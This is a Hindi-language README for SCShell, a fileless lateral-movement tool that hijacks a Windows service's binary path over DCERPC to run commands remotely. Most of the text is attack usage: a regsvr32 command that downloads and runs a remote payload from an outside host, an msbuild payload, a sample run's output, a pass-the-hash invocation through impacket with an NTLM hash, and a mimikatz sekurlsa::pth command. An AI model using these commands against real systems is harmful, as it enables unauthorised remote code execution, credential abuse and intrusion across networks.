
फाइललेस पार्श्व संचलन उपकरण जो कमांड चलाने के लिए ChangeServiceConfigA पर निर्भर करता है
SCShell एक फाइललेस लेटरल मूवमेंट टूल है जो कमांड चलाने के लिए ChangeServiceConfigA पर निर्भर करता है। इस टूल की खूबसूरती यह है कि यह SMB के खिलाफ प्रमाणीकरण नहीं करता है। सब कुछ DCERPC पर होता है।
इस उपयोगिता का उपयोग दूरस्थ रूप से सेवा को पंजीकृत किए बिना या सेवा बनाए बिना किया जा सकता है। इसे रिमोट सिस्टम* पर कोई फ़ाइल गिराने की भी आवश्यकता नहीं है (निष्पादन के लिए उपयोग की जाने वाली तकनीक पर निर्भर करता है)
सेवा बनाने के बजाय यह बस एक सेवा को दूरस्थ रूप से खोलता है और ChangeServiceConfigA API के माध्यम से बाइनरी पथ नाम को संशोधित करता है।
फिर यह सेवा शुरू करता है।
निष्पादन पूरा होने के बाद सेवा बाइनरी पथ मूल पर वापस कर दिया जाता है। मूल सेवा पथ QueryServiceConfigA का उपयोग करके निकाला जाता है।
प्रमाणीकरण सहित सब कुछ DCERPC पर हो रहा है।

वर्तमान बिल्ड C में लिखा गया है लेकिन मैं इसे C# और PowerShell में पोर्ट करूंगा।
Usage:
SCShell.exe target service payload domain username password
target को पेलोड को स्थानीय रूप से चलाने के लिए local पर सेट किया जा सकता है
रिमोट निष्पादन
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password
मैं C:\windows\system32\cmd.exe /c का उपयोग करने की सलाह देता हूं ताकि यह सुनिश्चित हो सके कि पेलोड सेवा बंद होने पर मारा न जाए। आपको पूर्ण पथ का उपयोग करने की आवश्यकता है।
आप msbuild पेलोड का भी उपयोग कर सकते हैं
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password
SCShell ***
Trying to connect to 192.168.197.131
Username was provided attempting to call LogonUserA
SC_HANDLE Manager 0x009ED250
Opening XblAuthManager
SC_HANDLE Service 0x009ED1B0
Service path was changed to C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
Service was started.
मैं XblAuthManager को लक्ष्य के रूप में उपयोग कर रहा हूं जो Xbox Accessory Management Service है
scshell.py SCShell का एक python2 और 3 कार्यान्वयन है। impacket प्रोजेक्ट का उपयोग करके, इसका उपयोग pass the hash का उपयोग करके समान पार्श्व आंदोलन करने के लिए आसानी से किया जा सकता है।
स्थापना
pip install impacket
उपयोग
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Command need to use FULL path. No command output.
SCShell>
आप हैश पास करने के लिए C उपयोगिता का उपयोग कर सकते हैं। डिफ़ॉल्ट रूप से वर्तमान प्रक्रिया टोकन का उपयोग किया जाएगा। आप मानक pass the hash दृष्टिकोण का उपयोग करके वर्तमान प्रक्रिया टोकन सेट कर सकते हैं।
स्थानीय सिस्टम पर
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe
फिर नवनिर्मित cmd.exe के भीतर SCShell.exe चलाएं।
कोड विंडोज पर GCC Mingw कंपाइलर का उपयोग करके संकलित किया गया था
Mr.Un1k0d3r RingZer0 Team
नैतिक समर्थन के लिए Tazz0